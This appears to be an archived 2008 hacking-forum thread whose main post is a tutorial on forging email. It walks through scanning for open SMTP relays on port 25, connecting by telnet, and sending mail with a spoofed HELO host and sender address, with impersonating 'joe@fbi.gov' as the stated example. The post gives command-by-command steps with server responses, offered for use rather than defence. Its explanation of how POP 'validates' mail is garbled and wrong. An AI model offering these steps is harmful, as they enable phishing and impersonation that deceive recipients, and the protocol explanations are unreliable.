PDA

View Full Version : Another Forging E-mail tut



Nexus_Logik
01-05-2008, 10:47 PM
.....where do i begin.......first off SMTP and ESMTP have NOTHING to do with POP*...

Simple Mail Transfer Protocal or SMTP is a mail protocal used to SEND mail. Post Office Protocal or POP(pop*) is a protocal used to receive mail. THis is a direct flow in SOME smtp server. Most open SMTP server with no authentication will be expoitable to this the exploit is easy as pie to pull off manually.

Step One - Find a open smtp server

This is the hardest part. and the best way to find ne, if you do not know of one off hand. DO a setwork scan with such tools as superscan or netscan. and scan for port 25 which is the standard SMTP tcp/ip port

Step Two - Connecting

once we have acquired a suitable system we then open up a telnet(start->run-> type "cmd" and click ok -> at black screen type"telnet [host name/ip] 25" and hit enter

Now lets break this down for those who are unaware of how telnet works. Telnet [Host/ip] 25
Telnet -obviously the command to open the telnet program
[host/ip] - this is where you place the ip address of host name of the system
25 - port 25 is the standard smtp port

Alternative way

start->run-> type "cmd" and hit enter-> at black screen type "telnet" -> at telnet> prompt type "connection"-> at "to" prompt type "[hostname/ip] 25" his enter

Step * - introducing yoruself to the system

once connect you should see sometihng along the lines of Code:

You should receive a reply like:
Trying ???.???.???.???...
Connected to [hostname].
Escape character is '^]'.
220 [hostname/ip] SMTP Sendmail ?version-number?;



Now we tell the system who "we" are. to do this we use the "HELO" command. Code:

HELO [something fake]



and the system will replay to you
Code:

250 [Target Host/Ip] Hello [Fkae Host/IP], pleased to meet you



no do not quote me on this because i am not sure if this works anymore. but one used ot be able to fool the header simple by using the correct host system...hence if your sending this mail to someone saying your "joe@fbi.gov" you wuld put
Code:

HELO www.fbi.gov


Step 4 - Sending the e-mail

Now is when we declare who we are sending the e-mail to, and who it will be from and also include the message

First we have to tell the system who we are by using the following command
Code:

MAIL FROM: mail@domain.ext



this is where you will put the fake e-mail addy, ther eiwll be a sligth pause or delay and you shoudl get replied back Code:

250 2.*.0 mail@domain.ext... Sender ok



Once again the mail@domain.ext would be the fake addy. Now we tell the system who we are sending this e-mail to
Code:

RCPT TO: mail@target.ext



the systemwill reply back to you
Code:

250 2.*.0 mail@target.ext... Recipient ok



Inut sebject Code:

Subject:-type subject here-


then hit enter twice to confirm it, once thi shappens you use the data command to start the e-mail. Code:

data [your text]



now to complete the letter you hit enter and in the blank line you type a single "." and hit enter. Now if done correctly you shoudl get Code:

250 2.0.0 ???????? Message accepted for delivery



now we just type "quot" and will get
Code:

22* 2.0.0 [Targethost] closing connection
Connection closed by foreign host.



Congrats you have just sent a forged e-mail.

Now fomr here the SMTP will send it over to the POP*, because it is comign from a "trusted" server the POP* shoudl self validate it and send it on through. So this hack is not hacking the pop* so much as just confusing it. See the POP* is made to accept e-mails that are validated.....the smtp with no authentiation is already a security risk in the first place.

What have we learned?

Forged E-mails are a exploit based off the SMTP server, because this SMP server validates the e-mail on it's end, the POP* doe snot knwo the difference.

Enjoy

Moonbat
01-06-2008, 08:53 PM
I covered most of this in my tut, but nice job anyway :D

Nexus_Logik
01-07-2008, 10:53 AM
Yeah I saw your post, and Noticed alot of people were asking questions on a few things. So I decided to toss it up there.